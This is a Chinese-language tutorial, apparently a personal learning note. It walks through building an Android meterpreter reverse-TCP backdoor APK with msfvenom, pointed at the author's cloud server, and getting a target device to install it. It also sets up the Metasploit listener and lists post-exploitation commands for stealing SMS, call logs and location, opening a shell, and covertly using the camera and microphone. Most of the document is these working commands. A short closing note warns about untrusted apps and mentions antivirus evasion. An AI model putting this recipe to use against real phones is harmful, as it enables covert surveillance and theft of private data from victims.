目录
方法二:安装centos 7 。在centos 7 上安装msf。安装方法
记录一下学习渗透工具的使用。
原理:msf生成Android 后门木马,靶机运行木马实现反向链接攻击机。
靶机ip:随机
攻击机ip:111.229.***.*** (腾讯云服务器)
一、云服务器配置
方法一:安装kali linux。因为服务商没有提供kali版本的系统版本,这里有个篇文章是用存储桶的方式制作kali镜像,通过自定义镜像安装《kali linux 云服务器,云服务器安装kali linux》。
方法二:安装centos 7 。在centos 7 上安装msf。安装方法
《渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装)》
二、木马生成
命令: msfvenom -p android/meterpreter/reverse_tcp LHOST= <本地ip> LPORT=<本地端口号> R > <文件名>.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=111.229.***.*** LPORT=7788 R >test.apk
生成完成/root目录下生成test.apk
接下来就要把test.apk拿下来,发送到目标机上
我这里是用本地安装的kali虚拟机通过scp命令下载这个木马文件(因为本来就在本地安装过kali和xshell,所以就用scp和sz来传输文件,也可以用windows的cmd直接下载服务器文件:pscp命令,但是前提要安装PuTTY,并配置好环境变量)
scp root@111.229.***.***:/root/test.apk /root
sz /root/test.apk
这样文件就下载到本地了。接下来就是让靶机安装apk,并运行此apk。
三、渗透
服务器运行以下命令:
msfconsole #运行msf
use exploit/multi/handler #选择模块
set payload android/meterpreter/reverse_tcp #选择攻击模块
set LhOST 0.0.0.0 #填写自己主机的IP地址
set lport 7788 #填写刚才生成木马时的端口号
run
这样就是在进行监听了,现在就等靶机运行app。
当出现meterpreter>就说明已经渗透成功了。
dump_sms #获取所有短信
四、msf常用命令:
dump_calllog #获取通讯录
geolocate #获取定位
shell #运行靶机shell
webcam_chat #与靶机视频
webcam_list #获取靶机摄像头
webcam_stream #开启靶机摄像头监控
record_mic #录音
webcam_snap #拍照
五、总结:
网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件。